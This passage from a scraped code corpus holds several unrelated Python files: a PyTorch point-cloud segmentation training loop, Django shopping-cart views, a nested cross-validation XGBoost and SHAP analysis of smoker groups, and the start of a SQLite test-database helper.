'{}'\".format(args.resume))\n\n    # Create dataset (local to worker)\n    train_transform = t.Compose([\n        t.RandomScale([0.9, 1.1]),  # rescale\n        t.ChromaticAutoContrast(),  # more contrast in rgb\n        t.ChromaticTranslation(),  # add random noise on rgb\n        t.ChromaticJitter(),  # jitter on rgb\n        t.HueSaturationTranslation(),  # aug on hue & saturation\n    ])\n    train_data = S3DIS(args, split='train', data_root=args.data_root, test_area=args.test_area, voxel_size=args.voxel_size, voxel_max=args.voxel_max, transform=train_transform, shuffle_index=True, loop=args.loop)\n    if main_process():\n        logger.info(\"train_data samples: '{}'\".format(len(train_data)))\n    if args.distributed:\n        train_sampler = torch.utils.data.distributed.DistributedSampler(train_data)\n    else:\n        train_sampler = None\n    train_loader = torch.utils.data.DataLoader(train_data, batch_size=args.batch_size, shuffle=(train_sampler is None), num_workers=args.workers, pin_memory=True, sampler=train_sampler, drop_last=True, collate_fn=train_data.collate_fn)\n\n    val_loader = None\n    if args.evaluate:\n        val_transform = None\n        val_data = S3DIS(args, split='val', data_root=args.data_root, 
test_area=args.test_area, voxel_size=args.voxel_size, voxel_max=800000, transform=val_transform)\n if args.distributed:\n val_sampler = torch.utils.data.distributed.DistributedSampler(val_data)\n else:\n val_sampler = None\n val_loader = torch.utils.data.DataLoader(val_data, batch_size=args.batch_size_val, shuffle=False, num_workers=args.workers, pin_memory=True, sampler=val_sampler, collate_fn=val_data.collate_fn)\n\n # Train\n if main_process():\n train_time = time.time()\n for epoch in range(args.start_epoch, args.epochs):\n if args.distributed:\n train_sampler.set_epoch(epoch)\n if main_process():\n print(f'****EPOCH {epoch+1}****\\nlearning rate = {scheduler.get_last_lr()}', flush=True)\n loss_train, mIoU_train, mAcc_train, allAcc_train = train(train_loader, model, criterion, optimizer, epoch)\n scheduler.step()\n epoch_log = epoch + 1\n if main_process():\n writer.add_scalar('loss_train', loss_train.sum(), epoch_log)\n for i, v in enumerate(loss_train):\n writer.add_scalar(f'loss_train_{i}', v, epoch_log)\n writer.add_scalar('mIoU_train', mIoU_train, epoch_log)\n writer.add_scalar('mAcc_train', mAcc_train, epoch_log)\n writer.add_scalar('allAcc_train', allAcc_train, epoch_log)\n\n is_best = False\n if args.evaluate and (epoch_log % args.eval_freq == 0):\n if args.data_name == 'shapenet':\n raise NotImplementedError()\n else:\n loss_val, mIoU_val, mAcc_val, allAcc_val = validate(val_loader, model, criterion)\n\n if main_process():\n writer.add_scalar('loss_val', loss_val.sum(), epoch_log)\n for i, v in enumerate(loss_val):\n writer.add_scalar(f'loss_val_{i}', v, epoch_log)\n writer.add_scalar('mIoU_val', mIoU_val, epoch_log)\n writer.add_scalar('mAcc_val', mAcc_val, epoch_log)\n writer.add_scalar('allAcc_val', allAcc_val, epoch_log)\n is_best = mIoU_val > best_iou\n best_iou = max(best_iou, mIoU_val)\n\n if (epoch_log % args.save_freq == 0) and main_process():\n filename = args.save_path + '/model/model_last.pth'\n logger.info('Saving checkpoint to: ' + filename)\n torch.save({'epoch': epoch_log, 'state_dict': model.state_dict(), 'optimizer': optimizer.state_dict(),\n 'scheduler': scheduler.state_dict(), 'best_iou': best_iou, 'is_best': is_best}, filename)\n if is_best:\n logger.info('Best validation mIoU updated to: {:.4f}'.format(best_iou))\n shutil.copyfile(filename, args.save_path + '/model/model_best.pth')\n\n if main_process():\n writer.close()\n train_time = (time.time() - train_time) / 60 ** 2\n logger.info('==>Training done!\\nTime: %.2fh\\nBest Iou: %.3f' % (train_time, best_iou))\n\n\ndef train(train_loader, model, criterion, optimizer, epoch):\n batch_time = AverageMeter()\n data_time = AverageMeter()\n loss_meter = AverageMeter()\n intersection_meter = AverageMeter()\n union_meter = AverageMeter()\n target_meter = AverageMeter()\n\n model.train()\n end = time.time()\n max_iter = args.epochs * len(train_loader)\n for i, inputs in enumerate(train_loader): # coord (n, 3), feat (n, c), label (n), offset (b)\n data_time.update(time.time() - end)\n inputs = {k: v.cuda(non_blocking=True) for k, v in inputs.items()}\n target = inputs['point_labels']\n coord, feat, offset = inputs['points'], inputs['features'], inputs['offset']\n output, stage_list = model(inputs)\n if target.shape[-1] == 1:\n target = target[:, 0] # for cls\n loss = criterion(output, target, stage_list)\n optimizer.zero_grad()\n loss.sum().backward()\n optimizer.step()\n\n output = output.max(1)[1] # [BxN] - pred with argmax of logits (dim=1)\n n = coord.size(0)\n if args.multiprocessing_distributed:\n loss *= 
n\n            count = target.new_tensor([n], dtype=torch.long)\n            dist.all_reduce(loss), dist.all_reduce(count)\n            n = count.item()\n            loss /= n\n        intersection, union, target = intersectionAndUnionGPU(output, target, args.classes, args.ignore_label)\n        if args.multiprocessing_distributed:\n            dist.all_reduce(intersection), dist.all_reduce(union), dist.all_reduce(target)\n        intersection, union, target = intersection.cpu().numpy(), union.cpu().numpy(), target.cpu().numpy()\n        intersection_meter.update(intersection), union_meter.update(union), target_meter.update(target)\n\n        accuracy = sum(intersection_meter.val) / (sum(target_meter.val) + 1e-10)\n        loss_meter.update(loss.detach().cpu().numpy(), n)\n        batch_time.update(time.time() - end)\n        end = time.time()\n\n        # calculate remain time\n        current_iter = epoch * len(train_loader) + i + 1\n        remain_iter = max_iter - current_iter\n        remain_time = remain_iter * batch_time.avg\n        t_m, t_s = divmod(remain_time, 60)\n        t_h, t_m = divmod(t_m, 60)\n        remain_time = '{:02d}:{:02d}:{:02d}'.format(int(t_h), int(t_m), int(t_s))\n\n        if (i + 1) % args.print_freq == 0 and main_process():\n            logger.info('Epoch: [{}/{}][{}/{}] '\n                        'Data {data_time.val:.3f} ({data_time.avg:.3f}) '\n                        'Batch {batch_time.val:.3f} ({batch_time.avg:.3f}) '\n                        'Remain {remain_time} '.format(epoch+1, args.epochs, i + 1, len(train_loader),\n                                                       batch_time=batch_time, data_time=data_time,\n                                                       remain_time=remain_time) + \\\n                f'Loss {loss_meter.val} '\n                f'Accuracy {accuracy:.4f}.')\n        if main_process():\n            loss_train_batch = loss_meter.val\n            writer.add_scalar('loss_train_batch', loss_train_batch.sum(), current_iter)\n            for j, v in enumerate(loss_train_batch):  # j, not i: keep the dataloader loop index intact\n                writer.add_scalar(f'loss_train_batch_{j}', v, current_iter)\n            writer.add_scalar('mIoU_train_batch', np.mean(intersection / (union + 1e-10)), current_iter)\n            writer.add_scalar('mAcc_train_batch', np.mean(intersection / (target + 1e-10)), current_iter)\n            writer.add_scalar('allAcc_train_batch', accuracy, current_iter)\n\n    iou_class = intersection_meter.sum / (union_meter.sum + 1e-10)\n    accuracy_class = intersection_meter.sum / (target_meter.sum + 1e-10)\n    mIoU = np.mean(iou_class)\n    mAcc = np.mean(accuracy_class)\n    allAcc = sum(intersection_meter.sum) / (sum(target_meter.sum) + 1e-10)\n    if main_process():\n        logger.info('Train result at epoch [{}/{}]: mIoU/mAcc/allAcc {:.4f}/{:.4f}/{:.4f}.'.format(epoch+1, args.epochs, mIoU, mAcc, allAcc))\n    return loss_meter.avg, mIoU, mAcc, allAcc\n\n\ndef validate(val_loader, model, criterion):\n    if main_process():\n        logger.info('>>>>>>>>>>>>>>>> Start Evaluation >>>>>>>>>>>>>>>>')\n    batch_time = AverageMeter()\n    data_time = AverageMeter()\n    loss_meter = AverageMeter()\n    intersection_meter = AverageMeter()\n    union_meter = AverageMeter()\n    target_meter = AverageMeter()\n\n    model.eval()\n    end = time.time()\n    for i, inputs in enumerate(val_loader):\n        data_time.update(time.time() - end)\n        inputs = {k: v.cuda(non_blocking=True) for k, v in inputs.items()}\n        target = inputs['point_labels']\n        coord, feat, offset = inputs['points'], inputs['features'], inputs['offset']\n        if target.shape[-1] == 1:\n            target = target[:, 0]  # for cls\n        with torch.no_grad():\n            output, stage_list = model(inputs)\n            loss = criterion(output, target, stage_list)\n\n        output = output.max(1)[1]\n        n = coord.size(0)\n        if args.multiprocessing_distributed:\n            loss *= n\n            count = target.new_tensor([n], dtype=torch.long)\n            dist.all_reduce(loss), dist.all_reduce(count)\n            n = count.item()\n            loss /= n\n\n        intersection, union, target = intersectionAndUnionGPU(output, target, 
args.classes, args.ignore_label)\n        if args.multiprocessing_distributed:\n            dist.all_reduce(intersection), dist.all_reduce(union), dist.all_reduce(target)\n        intersection, union, target = intersection.cpu().numpy(), union.cpu().numpy(), target.cpu().numpy()\n        intersection_meter.update(intersection), union_meter.update(union), target_meter.update(target)\n\n        accuracy = sum(intersection_meter.val) / (sum(target_meter.val) + 1e-10)\n        loss_meter.update(loss.detach().cpu().numpy(), n)\n        batch_time.update(time.time() - end)\n        end = time.time()\n        if (i + 1) % args.print_freq == 0 and main_process():\n            logger.info('Test: [{}/{}] '\n                        'Data {data_time.val:.3f} ({data_time.avg:.3f}) '\n                        'Batch {batch_time.val:.3f} ({batch_time.avg:.3f}) '.format(i + 1, len(val_loader),\n                                                                                    data_time=data_time,\n                                                                                    batch_time=batch_time) + \\\n                f'Loss {loss_meter.val} ({loss_meter.avg}) '\n                f'Accuracy {accuracy:.4f}.')\n\n    iou_class = intersection_meter.sum / (union_meter.sum + 1e-10)\n    accuracy_class = intersection_meter.sum / (target_meter.sum + 1e-10)\n    mIoU = np.mean(iou_class)\n    mAcc = np.mean(accuracy_class)\n    allAcc = sum(intersection_meter.sum) / (sum(target_meter.sum) + 1e-10)\n\n    if main_process():\n        logger.info('Val result: mIoU/mAcc/allAcc {:.4f}/{:.4f}/{:.4f}.'.format(mIoU, mAcc, allAcc))\n        for i in range(args.classes):\n            logger.info('Class_{} Result: iou/accuracy {:.4f}/{:.4f}.'.format(i, iou_class[i], accuracy_class[i]))\n        logger.info('<<<<<<<<<<<<<<<<< End Evaluation <<<<<<<<<<<<<<<<<')\n\n    return loss_meter.avg, mIoU, mAcc, allAcc\n\n\nif __name__ == '__main__':\n    import gc\n    gc.collect()\n    main()\n","repo_name":"LiyaoTang/contrastBoundary","sub_path":"pytorch/tool/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":20366,"program_lang":"python","lang":"en","doc_type":"code","stars":117,"dataset":"github-code","pt":"61"} +{"seq_id":"11700393312","text":"from django.shortcuts import render,redirect\nfrom django.views import View\nfrom .models import Product,Cart\nfrom django.db.models import Q\nfrom django.http import JsonResponse\nfrom django.views.generic import ListView,DetailView\n#def home(request):\n    #return render(request, 'app/home.html')\n\nclass ProductView(ListView):\n    model=Product\n    fields=['id','title','selling_price','discounted_price',\n            'description','product_image',]\n    template_name = 'app/home.html'\n    success_url='/product-detail/'\n\nclass ProductDetailView(View):\n    def get(self, request, pk):\n        product = Product.objects.get(pk=pk)\n        return render(request, 'app/productdetail.html',{'product':product})\n\ndef add_to_cart(request):\n    user=request.user\n    product_id = request.GET.get('prod_id')\n    product = Product.objects.get(id=product_id)\n    Cart(user=user, product=product).save()\n    return redirect('/cart/')\n\n\ndef show_cart(request):\n    if request.user.is_authenticated:\n        user = request.user\n        cart = Cart.objects.filter(user=user)\n        amount = 0.0\n        shipping_amount = 200\n        totalamount = 0.0\n        cart_product = [p for p in Cart.objects.all() if p.user == user]\n        if cart_product:\n            for p in cart_product:\n                tempamount = (p.quantity * p.product.discounted_price)\n                amount += tempamount\n                totalamount = amount + shipping_amount\n            return render(request, 'app/addtocart.html',{'carts':cart,\n                          'totalamount':totalamount, 'amount':amount})\n    else:\n        return render(request, 'app/emptycart.html')\n\ndef plus_cart(request):\n    if request.method == 'GET':\n        prod_id = request.GET['prod_id']\n        c = Cart.objects.get(Q(product=prod_id) & Q(user=request.user))\n        c.quantity+=1\n        c.save()\n        amount = 0.0\n
        shipping_amount = 200\n        totalamount = 0.0\n        cart_product = [p for p in Cart.objects.all() if p.user == request.user]\n        if cart_product:\n            for p in cart_product:\n                tempamount = (p.quantity * p.product.discounted_price)\n                amount += tempamount\n\n        data = {\n            'quantity': c.quantity,\n            'amount': amount,\n            'totalamount':amount + shipping_amount\n        }\n        return JsonResponse(data)\n\ndef minus_cart(request):\n    if request.method == 'GET':\n        prod_id = request.GET['prod_id']\n        c = Cart.objects.get(Q(product=prod_id) & Q(user=request.user))\n        c.quantity-=1\n        c.save()\n        amount = 0.0\n        shipping_amount = 200\n        totalamount = 0.0\n        cart_product = [p for p in Cart.objects.all() if p.user == request.user]\n        if cart_product:\n            for p in cart_product:\n                tempamount = (p.quantity * p.product.discounted_price)\n                amount += tempamount\n\n        data = {\n            'quantity': c.quantity,\n            'amount': amount,\n            'totalamount':amount + shipping_amount\n        }\n        return JsonResponse(data)\n\ndef remove_cart(request):\n    if request.method == 'GET':\n        prod_id = request.GET['prod_id']\n        c = Cart.objects.get(Q(product=prod_id) & Q(user=request.user))\n\n        c.delete()\n        amount = 0.0\n        shipping_amount = 200\n        totalamount = 0.0\n        cart_product = [p for p in Cart.objects.all() if p.user == request.user]\n        if cart_product:\n            for p in cart_product:\n                tempamount = (p.quantity * p.product.discounted_price)\n                amount += tempamount\n\n        data = {\n            'amount': amount,\n            'totalamount': amount + shipping_amount\n        }\n        return JsonResponse(data)\n","repo_name":"Khuda-Bux/ecom1","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10205471536","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Oct 19 19:50:05 2022\n\n@author: pablo\n\"\"\"\n\n\n#SEED = 1000\n#model = XGBClassifier()\n#cv = RepeatedStratifiedKFold(n_splits=10, n_repeats=10, random_state=1)\n#pipeline = imbpipeline(steps = [['smote',SMOTETomek()],['classifier', model]])\n#score_nested = cross_validate(pipeline, X, y, cv=cv, scoring = 'accuracy', return_estimator =True)\n\n\n#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#\n# performs repeated nested cross validation by domain (eeg, neuropsych, clinical, socio-environmental) #\n# loosely based on towardsdatascience.com/using-shap-with-cross-validation-d24af548fadc #\n#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#\n\n\nimport os\nimport pandas as pd\nimport numpy as np\nimport pickle\nimport shap\nfrom sklearn.compose import ColumnTransformer\nfrom sklearn.base import BaseEstimator,TransformerMixin\nfrom sklearn.preprocessing import FunctionTransformer\nfrom sklearn.pipeline import Pipeline, make_pipeline\nfrom sklearn.decomposition import PCA\nfrom sklearn.impute import SimpleImputer\nfrom sklearn.preprocessing import RobustScaler\nfrom sklearn.feature_selection import VarianceThreshold\nfrom sklearn.feature_selection import SelectPercentile, chi2,SelectFdr,SelectFwe\nfrom sklearn.svm import SVC\nfrom sklearn.feature_selection import SelectFromModel\nfrom sklearn import tree\nimport xgboost\nfrom xgboost import XGBClassifier\nimport shap\nfrom imblearn.over_sampling import ADASYN, SVMSMOTE, BorderlineSMOTE,KMeansSMOTE\nfrom sklearn.metrics import precision_score, recall_score,f1_score, balanced_accuracy_score, auc\nfrom sklearn.ensemble import 
StackingClassifier, IsolationForest\nfrom sklearn.model_selection import RepeatedStratifiedKFold\nfrom sklearn.model_selection import RepeatedKFold\nfrom sklearn.model_selection import RandomizedSearchCV\nimport matplotlib.pylab as plt\nfrom sklearn.metrics import accuracy_score\nfrom imblearn.combine import SMOTETomek\nfrom imblearn.under_sampling import TomekLinks\nfrom sklearn.model_selection import RandomizedSearchCV, GridSearchCV, StratifiedKFold, train_test_split\nfrom sklearn.preprocessing import MinMaxScaler\nfrom imblearn.over_sampling import SMOTE\nfrom imblearn.pipeline import Pipeline as imbpipeline\nfrom sklearn.pipeline import Pipeline\nfrom numpy import mean\nfrom numpy import std\nfrom sklearn.metrics import accuracy_score, roc_auc_score, roc_curve\nfrom sklearn.metrics import classification_report\nfrom sklearn.preprocessing import StandardScaler, MinMaxScaler\nfrom sklearn.impute import KNNImputer\nfrom imblearn.under_sampling import RandomUnderSampler\nimport glob\n\n\n\ndef load_X():\n    direc = \"./\"\n    os.chdir(direc)\n    X = pd.read_csv(glob.glob(\"*.csv\")[0],encoding=\"utf-8\", sep=\"\\t\", index_col=0).reset_index(drop=True)\n    y = X.groups_hs_ls\n    ## \"positive\" class\n    y = y.replace({0:1,1:0})\n    X = X.drop(X.filter(regex=\"group|ID\").columns.to_list(),axis=1)\n    return X,y\n\n\nX,y = load_X()\n\neeg = X.filter(regex=r\"q_[A-Z]z(?=[\\w+])|Average\").columns.to_list()\nneuropsych = X.filter(regex=\"cpt|fwit|vlm|bls|bzt|vfl|mwt|zsn\").columns.to_list()\nclinical = X.filter(regex=r\"audit|adhd|psqi|PSQI|STAI|stai|tpq|fev|neo|rrs|rrd|haendig|bdi_|pss|BMI|psychiatrisch|soz_10|soz_11|soz_12|qsu|BDI|PSS|mean|pack|ftnd|onset\").columns.to_list()\nsocio_environmental = X.filter(regex=r\"vater|mutter|geschw|umfeld|familie|beruf|schule|soz_03|soz_04|soz_05|soz_06|soz_07|soz_08|soz_09|gender|^age\").columns.to_list()\n\nall_categories = [eeg, neuropsych, clinical, socio_environmental]\nall_categories_dict= ({\"EEG\":eeg, \"neuropsychological\":neuropsych, \"clinical\": clinical, \"sociodemographic-environmental\": socio_environmental})\n\n\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\nimport matplotlib\nmatplotlib.use('Agg')\n\n\nfrom imblearn import FunctionSampler\nfrom imblearn.pipeline import make_pipeline\n\ndef outlier_rejection(X, y):\n    \"\"\"This will be our function used to resample our dataset.\"\"\"\n    model = IsolationForest(max_samples=1, contamination=\"auto\", random_state=1510)\n    model.fit(X)\n    y_pred = model.predict(X)\n    return X[y_pred == 1], y[y_pred == 1]\n\nreject_sampler = FunctionSampler(func=outlier_rejection)\n\n\n\nimport sys\nimport builtins\nimport os\n\nfn = \"fnlog.txt\"\nsys.stdout = open(fn, \"w\", buffering=1)\ndef print(*args, **kwargs):\n    # mirror builtins.print into the line-buffered log file and force it to disk\n    builtins.print(*args, **kwargs)\n    os.fsync(sys.stdout.fileno())\n\n\n\n### iterate over categories\n\nfor key, value in all_categories_dict.items():\n\n    print(key)\n    X,y = load_X()\n    X = X[value]\n\n\n    # Reproducibility\n    np.random.seed(1)\n\n    # repetitions\n    N_CV_REPEATS = 5\n\n\n    from datetime import datetime\n    start_time = datetime.now()\n\n    import time\n    timestr = time.strftime(\"%Y-%m-%d-%H-%M-%S\")\n    fname = \"nestedCV_\"+str(N_CV_REPEATS)+\"_repeats_\"+timestr+\"___\"+key\n    directory = \"./per_domain/{}_{}\".format(key,timestr)\n    os.makedirs(directory, exist_ok=True)  # outputs are written here after the later os.chdir(directory)\n\n\n\n\n    # Make a list of random integers between 0 and 10000 of length = N_CV_repeats to act as different data splits\n    random_states = np.random.randint(10000, size=N_CV_REPEATS)\n
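\n    # The bookkeeping built next ends up as a nested dict,\n    #   shap_values_per_cv[sample_index][repeat_index] -> per-feature SHAP row,\n    # e.g. shap_values_per_cv[12][3] is the SHAP vector of sample 12 in CV repeat 3.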
\n    ######## Use a dict to track the SHAP values of each observation per CV repetition\n    shap_values_per_cv = dict()\n    for sample in X.index:\n        ## Create keys for each sample\n        shap_values_per_cv[sample] = {}\n        ## Then, keys for each CV fold within each sample\n        for CV_repeat in range(N_CV_REPEATS):\n            shap_values_per_cv[sample][CV_repeat] = {}\n\n\n\n    SEED = 1510\n    count = 0\n\n    labels=['Heavy Smokers','Light Smokers']\n\n    import matplotlib.pyplot as plt\n    import numpy as np\n    # save // plot stuff\n    fig, ax = plt.subplots()\n    outer_results, conf_matrix_list_of_arrays, tprs, aucs, results = [],[],[],[],[]\n    base_fpr = np.linspace(0, 1, 101)\n    mean_fpr = np.linspace(0, 1, 100)\n\n\n\n    for i, CV_repeat in enumerate(range(N_CV_REPEATS)):\n\n        # Establish CV scheme\n        CV = StratifiedKFold(n_splits=10, shuffle=True, random_state=random_states[i])\n        print(\"CV repeat {}\".format(CV_repeat))\n\n\n        ix_training, ix_test = [], []\n        # Loop through each fold and append the training & test indices to the empty lists above\n        for fold in CV.split(X,y):\n            ix_training.append(fold[0]), ix_test.append(fold[1])\n\n        ## Loop through each outer fold and extract SHAP values\n        for i, (train_outer_ix, test_outer_ix) in enumerate(zip(ix_training, ix_test)):\n            # Verbose\n            print('Fold Number:{}'.format(i))\n            X_train, X_test = X.iloc[train_outer_ix, :], X.iloc[test_outer_ix, :]\n            y_train, y_test = y.iloc[train_outer_ix], y.iloc[test_outer_ix]\n\n\n            ## Establish inner CV for parameter optimization\n            cv_inner = StratifiedKFold(n_splits=5, shuffle=True, random_state=1510)\n\n            pipeline = imbpipeline(steps = [\n                ['imputer',SimpleImputer(strategy=\"most_frequent\")],\n                ['smote',SMOTETomek()],\n                ['outlier',reject_sampler],\n                ['scaler', MinMaxScaler()],\n                ['classifier', XGBClassifier(verbose=0)]\n            ])\n\n\n            params = {\n                'classifier__max_depth':[4, 6, 8, 10],\n                'classifier__learning_rate': [.01,.1,.2,.3],\n                'classifier__subsample': [.7, .8, .9,1],\n                'classifier__gamma':[0,.1,.3,.5,1],\n                'classifier__colsample_bytree': [.6, .8, 1.0]\n            }\n\n\n            # Search to optimize hyperparameters\n            search = RandomizedSearchCV(pipeline, params, cv=cv_inner)\n            search.fit(X_train, y_train)\n\n            # evaluate the model\n            yhat = search.predict(X_test)\n            ypred = search.predict_proba(X_test)\n            result = roc_auc_score(y_test, yhat)\n            acc = accuracy_score(y_test, yhat)\n            print(\"{:.2f}\".format(result))\n\n\n            ## Use SHAP to explain predictions\n            ### prepare preprocessed X_test\n            cloned_preproc_pipe = Pipeline([search.best_estimator_.steps[0], search.best_estimator_.steps[3]])\n            X_test_transformed = pd.DataFrame(data=cloned_preproc_pipe.transform(X_test), columns=X.columns)\n\n\n            explainer = shap.TreeExplainer(search.best_estimator_.steps[-1][1])\n            shap_values = explainer.shap_values(X_test_transformed)\n\n            # Extract SHAP information per fold per sample\n            for j, test_index in enumerate(test_outer_ix):  # j, not i: the fold index i is still needed below\n                shap_values_per_cv[test_index][CV_repeat] = shap_values[j]\n\n\n            # Append\n            results.append({'count':count,'yhat':\n                            yhat,'ypred':ypred,\n                            'ytest':y_test,\n                            'score_acc':[acc]})\n\n            y_pred = pd.DataFrame(ypred.argmax(axis=1))\n\n            conf_matrix = classification_report(list(y_test),list(ypred.argmax(axis=1)),target_names=labels,output_dict=True)\n            # save classification_report for obtaining precision,recall,f1 and accuracy for later\n            conf_matrix_list_of_arrays.append({'count':count,\n                                               'macro-avg':conf_matrix['macro avg'],\n                                               labels[0]:conf_matrix[labels[0]],\n                                               labels[1]:conf_matrix[labels[1]],\n                                               'weighted_avg':conf_matrix['weighted avg'],\n                                               
'accuracy':conf_matrix['accuracy']})\n\n # store acc\n outer_results.append(acc)\n # report progress\n fpr, tpr, _ = roc_curve(y_test, ypred[:, 1])\n roc_auc = roc_auc_score(y_test, ypred[:, 1])\n\n interp_tpr = np.interp(mean_fpr, fpr, tpr)\n interp_tpr[0] = 0.0\n tprs.append(interp_tpr)\n aucs.append(roc_auc)\n count = count+1\n \n ## print log\n print(\"randomized gs params:{}\".format(search.best_estimator_[-1].get_params()))\n print(\"CV repeat: {:.0f}, fold: {:.0f}, train:{:.3f}, test: {:.3f}\".format(CV_repeat, i, search.score(X_train,y_train),result))\n\n\n ax.plot([0, 1], [0, 1], linestyle=\"--\", lw=2, color=\"r\", label=\"Chance\", alpha=0.8)\n\n mean_tpr = np.mean(tprs, axis=0)\n mean_tpr[-1] = 1.0\n mean_auc = auc(mean_fpr, mean_tpr)\n std_auc = np.std(aucs)\n ax.plot(\n mean_fpr,\n mean_tpr,\n color=\"b\",\n label=r\"Mean ROC (AUC = %0.2f $\\pm$ %0.2f)\" % (mean_auc, std_auc),\n lw=2,\n alpha=0.8,\n )\n\n std_tpr = np.std(tprs, axis=0)\n tprs_upper = np.minimum(mean_tpr + std_tpr, 1)\n tprs_lower = np.maximum(mean_tpr - std_tpr, 0)\n\n tn = \"ROC classification {} vs {} \\n domain {}\".format(labels[0],labels[1],key)\n\n\n ax.fill_between(\n mean_fpr,\n tprs_lower,\n tprs_upper,\n color=\"lightcoral\",\n alpha=0.2,\n label=r\"$\\pm$ 1 std. dev.\",\n )\n\n ax.set(\n xlim=[-0.05, 1.05],\n ylim=[-0.05, 1.05],\n title=tn,\n )\n ax.legend(loc=\"lower right\")\n\n\n os.chdir(directory)\n plt.tight_layout()\n plt.savefig(\"ROC.png\",dpi=600)\n #plt.show()\n plt.close()\n\n resultsdf = pd.DataFrame(results)\n\n\n \n \n \n # Establish lists to keep average Shap values, their Stds, and their min and max\n average_shap_values, stds, ranges = [],[],[]\n\n for i in range(0,len(X)):\n df_per_obs = pd.DataFrame.from_dict(shap_values_per_cv[i]) # Get all SHAP values for sample number i (n(X) x N_REPEATS)\n # Get relevant statistics for every sample \n average_shap_values.append(df_per_obs.mean(axis=1).values) \n stds.append(df_per_obs.std(axis=1).values)\n ranges.append(df_per_obs.max(axis=1).values-df_per_obs.min(axis=1).values) \n \n \n shap_vals = np.array(average_shap_values)\n avg_shap_values = pd.DataFrame(shap_vals, columns=X.columns)\n fn = \"avg_shap_values_{}.csv\".format(key)\n avg_shap_values.to_csv(fn,encoding=\"utf-8\", sep=\"\\t\")\n\n stds_vals = np.array(stds)\n stds_df = pd.DataFrame(stds_vals, columns=X.columns)\n fn = \"stds_shap_values_{}.csv\".format(key)\n stds_df.to_csv(fn,encoding=\"utf-8\", sep=\"\\t\")\n\n\n ranges_vals = np.array(ranges)\n ranges_df = pd.DataFrame(ranges_vals, columns=X.columns)\n fn = \"ranges_shap_values_{}.csv\".format(key)\n ranges_df.to_csv(fn,encoding=\"utf-8\", sep=\"\\t\")\n \n\n \n end_time = datetime.now()\n print('Duration: {}'.format(end_time - start_time))\n \n \n # convert to dataframe\n resultsdf = pd.DataFrame(results)\n\n ypreds = list((np.concatenate(resultsdf[\"ypred\"])).argmax(axis=1))\n print(classification_report(list(np.concatenate(resultsdf[\"ytest\"])),ypreds,target_names=labels))\n\n report = classification_report(list(np.concatenate(resultsdf[\"ytest\"])),ypreds,target_names=labels, output_dict=True)\n df = pd.DataFrame(report).transpose()\n fn = \"results_{}.csv\".format(key)\n df.to_csv(fn, sep=\"\\t\", encoding=\"utf-8\")\n\n\n # save results\n resultsdf = pd.DataFrame(results)\n fn = \"results_{}.csv\".format(key)\n resultsdf.to_csv(fn,encoding=\"utf-8\",sep=\"\\t\")\n\n tprs_df = pd.DataFrame(data=tprs)\n tprs_df.to_csv(\"tprs.csv\", encoding=\"utf-8\",sep=\"\\t\")\n\n # save model \n import pickle\n import 
joblib\n    bm = search.best_estimator_.steps[-1][1]\n    with open(\"xgb_model.pkl\", \"wb\") as fp:\n        pickle.dump(bm, fp)\n\n    filename = 'grid_searched_model.sav'\n\n    model = search.best_estimator_.steps[-1][1]\n    joblib.dump(model, filename)\n\n\n    with open(\"conf_matrix_list_of_arrays.pkl\",\"wb\") as fp:\n        pickle.dump(conf_matrix_list_of_arrays,fp)\n\n    import pickle\n    fn = \"avgshap_values_{}.pkl\".format(key)\n    with open(fn,\"wb\") as fp:\n        pickle.dump(shap_vals,fp)\n","repo_name":"higgteil/eeg-predict","sub_path":"machine_learning/repeated_ncv_classif_by_domain.py","file_name":"repeated_ncv_classif_by_domain.py","file_ext":"py","file_size_in_byte":14374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22700462358","text":"\"\"\"\nModule with methods to extract a database dump, create a database from a dump\nfile, and add views to the database.\n\nThis is done so that a test database can easily be recreated to have a common\nstarting point for testing the package.\n\"\"\"\n\nimport os\nimport sqlite3 as sq3\nimport sys\n\nfrom text_unidecode import unidecode\n\n# set up paths for where to find original database\nBASE_PATH = os.path.split(os.path.abspath(__file__))[0]\nBASE_DATABASE_FILENAME = \"chinook.db\"\nBASE_DATABASE_PATH = os.path.join(BASE_PATH, BASE_DATABASE_FILENAME)\n\n# Or where to find dump file and create test database\nDUMP_PATH = os.path.join(BASE_PATH, f\"{BASE_DATABASE_FILENAME[:-3]}_dump.sql\")\nTEST_PATH = os.path.join(BASE_PATH, f\"test_{BASE_DATABASE_FILENAME}\")\nVIEW_DIR = os.path.join(BASE_PATH, \"views\")\n\n\ndef extract_dump(db_path, dump_path):\n    \"\"\"\n    Create dump of database given the path to the database file\n\n    PARAMETERS\n    db_path: str: path to database file\n    dump_path: str: path to the dump file to be saved\n    \"\"\"\n\n    with sq3.connect(db_path) as conn:\n        with open(dump_path, \"w\", newline=\"\") as f:\n            # noinspection PyTypeChecker\n            for line in conn.iterdump():\n                f.write(unidecode(line))\n\n\ndef load_dump(db_path, dump_path):\n    \"\"\"\n    Create test database given path to dump file\n\n    PARAMETERS\n    db_path: str: path to database file to be created\n    dump_path: str: path to the dump file to be used to create database\n    \"\"\"\n\n    # start by removing the existing database if one exists\n    try:\n        os.remove(db_path)\n    except PermissionError:\n        print(f\"could not delete {db_path}, continuing anyway\")\n    except FileNotFoundError:\n        # if the file was not found, nothing needs to be done.\n        pass\n\n    with open(dump_path, \"r\") as f:\n        sql = f.read()\n\n    with sq3.connect(db_path) as cursor:\n        try:\n            cursor.executescript(sql)\n        except sq3.OperationalError:\n            # most likely cause is the table already exists\n            pass\n\n\ndef add_views(db_path, view_dir):\n    \"\"\"\n    add views to database\n\n    PARAMETERS\n    db_path: str: path to database to have views added\n    view_dir: str: path to the directory with view files. The contents of the\n                   files are not the sql to create the view, but rather the\n                   query the view should have. The view name uses the filename\n                   of the query.\n    \"\"\"\n
